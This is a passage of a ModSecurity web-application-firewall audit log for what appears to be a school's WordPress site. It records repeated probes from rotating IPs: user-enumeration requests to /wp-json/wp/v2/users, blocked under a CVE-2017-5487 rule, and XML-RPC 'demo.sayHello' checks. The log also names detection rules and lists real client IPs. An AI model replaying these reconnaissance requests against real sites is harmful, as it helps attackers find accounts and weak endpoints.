[uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804905004849 3487 (- - -) Stopwatch2: 1746804905004849 3487; combined=1459, p1=498, p2=929, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --590f1145-Z-- --fa5f4457-A-- [09/May/2025:22:35:13 +0700] aB4gsVoC-7ITMWTA_c9eWQAAANE 103.236.140.4 56758 103.236.140.4 8181 --fa5f4457-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa5f4457-C-- demo.sayHello --fa5f4457-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa5f4457-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804913515206 4766 (- - -) Stopwatch2: 1746804913515206 4766; combined=3716, p1=459, p2=3057, p3=22, p4=23, p5=91, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa5f4457-Z-- --de54ff2b-A-- [09/May/2025:22:35:51 +0700] aB4g11oC-7ITMWTA_c9eXgAAAMY 103.236.140.4 56770 103.236.140.4 8181 --de54ff2b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --de54ff2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de54ff2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746804951236380 2977 (- - -) Stopwatch2: 1746804951236380 2977; combined=1278, p1=441, p2=807, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de54ff2b-Z-- --bdc3712f-A-- [09/May/2025:22:35:58 +0700] aB4g3loC-7ITMWTA_c9eYAAAAMg 103.236.140.4 56774 103.236.140.4 8181 --bdc3712f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bdc3712f-C-- demo.sayHello --bdc3712f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc3712f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804958551459 5405 (- - -) Stopwatch2: 1746804958551459 5405; combined=4103, p1=519, p2=3367, p3=29, p4=32, p5=93, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc3712f-Z-- --81941c6c-A-- [09/May/2025:22:36:16 +0700] aB4g8C-fAO47ojYKsMr58wAAAEo 103.236.140.4 56784 103.236.140.4 8181 --81941c6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.177 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --81941c6c-C-- demo.sayHello --81941c6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --81941c6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746804976269202 6270 (- - -) Stopwatch2: 1746804976269202 6270; combined=4582, p1=600, p2=3758, p3=32, p4=35, p5=93, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81941c6c-Z-- --029cb171-A-- [09/May/2025:22:36:47 +0700] aB4hDy-fAO47ojYKsMr59AAAAFM 103.236.140.4 56790 103.236.140.4 8181 --029cb171-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --029cb171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --029cb171-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805007060870 3159 (- - -) Stopwatch2: 1746805007060870 3159; combined=1353, p1=474, p2=849, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --029cb171-Z-- --6b64153e-A-- [09/May/2025:22:36:52 +0700] aB4hFB6q_ZMebht3q14k2wAAAJQ 103.236.140.4 56794 103.236.140.4 8181 --6b64153e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b64153e-C-- demo.sayHello --6b64153e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b64153e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805012718114 4865 (- - -) Stopwatch2: 1746805012718114 4865; combined=3776, p1=458, p2=3122, p3=21, p4=24, p5=88, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b64153e-Z-- --55825227-A-- [09/May/2025:22:36:52 +0700] aB4hFB6q_ZMebht3q14k3AAAAJU 103.236.140.4 56796 103.236.140.4 8181 --55825227-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --55825227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55825227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805012741650 1873 (- - -) Stopwatch2: 1746805012741650 1873; combined=938, p1=314, p2=586, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55825227-Z-- --60feaa74-A-- [09/May/2025:22:36:56 +0700] aB4hGB6q_ZMebht3q14k3gAAAIE 103.236.140.4 56802 103.236.140.4 8181 --60feaa74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60feaa74-C-- demo.sayHello --60feaa74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60feaa74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805016565456 4818 (- - -) Stopwatch2: 1746805016565456 4818; combined=3835, p1=450, p2=3076, p3=23, p4=26, p5=143, sr=67, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60feaa74-Z-- --87be7657-A-- [09/May/2025:22:37:23 +0700] aB4hMx6q_ZMebht3q14k4AAAAIs 103.236.140.4 56808 103.236.140.4 8181 --87be7657-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --87be7657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87be7657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805043177826 2533 (- - -) Stopwatch2: 1746805043177826 2533; combined=1206, p1=406, p2=772, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87be7657-Z-- --de081a0a-A-- [09/May/2025:22:37:28 +0700] aB4hOB6q_ZMebht3q14k4gAAAIc 103.236.140.4 56812 103.236.140.4 8181 --de081a0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de081a0a-C-- demo.sayHello --de081a0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de081a0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805048798819 4851 (- - -) Stopwatch2: 1746805048798819 4851; combined=3909, p1=460, p2=3167, p3=26, p4=29, p5=164, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de081a0a-Z-- --faf69676-A-- [09/May/2025:22:37:51 +0700] aB4hTx6q_ZMebht3q14k5AAAAIA 103.236.140.4 56824 103.236.140.4 8181 --faf69676-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --faf69676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf69676-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805071977479 3024 (- - -) Stopwatch2: 1746805071977479 3024; combined=1293, p1=448, p2=815, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf69676-Z-- --ce83ca5b-A-- [09/May/2025:22:37:58 +0700] aB4hVh6q_ZMebht3q14k6AAAAIY 103.236.140.4 56834 103.236.140.4 8181 --ce83ca5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce83ca5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce83ca5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805078245900 2180 (- - -) Stopwatch2: 1746805078245900 2180; combined=1201, p1=386, p2=785, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce83ca5b-Z-- --6afd7001-A-- [09/May/2025:22:38:03 +0700] aB4hWx6q_ZMebht3q14k6QAAAIM 103.236.140.4 56838 103.236.140.4 8181 --6afd7001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6afd7001-C-- demo.sayHello --6afd7001-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6afd7001-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805083314802 5481 (- - -) Stopwatch2: 1746805083314802 5481; combined=4110, p1=527, p2=3351, p3=28, p4=32, p5=100, sr=72, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6afd7001-Z-- --c56c5925-A-- [09/May/2025:22:38:08 +0700] aB4hYFoC-7ITMWTA_c9ebAAAAMA 103.236.140.4 56846 103.236.140.4 8181 --c56c5925-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c56c5925-C-- demo.sayHello --c56c5925-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c56c5925-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805088669397 4697 (- - -) Stopwatch2: 1746805088669397 4697; combined=3651, p1=428, p2=3026, p3=23, p4=24, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c56c5925-Z-- --3fefcb25-A-- [09/May/2025:22:38:09 +0700] aB4hYR6q_ZMebht3q14k6wAAAIU 103.236.140.4 56848 103.236.140.4 8181 --3fefcb25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fefcb25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fefcb25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805089651034 2011 (- - -) Stopwatch2: 1746805089651034 2011; combined=1046, p1=347, p2=672, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fefcb25-Z-- --c985a208-A-- [09/May/2025:22:38:15 +0700] aB4hZx6q_ZMebht3q14k7gAAAJU 103.236.140.4 56854 103.236.140.4 8181 --c985a208-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c985a208-C-- demo.sayHello --c985a208-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c985a208-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805095149850 5890 (- - -) Stopwatch2: 1746805095149850 5890; combined=4290, p1=591, p2=3418, p3=35, p4=94, p5=91, sr=84, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c985a208-Z-- --decf996c-A-- [09/May/2025:22:38:21 +0700] aB4hbS-fAO47ojYKsMr5-AAAAEg 103.236.140.4 56860 103.236.140.4 8181 --decf996c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --decf996c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --decf996c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 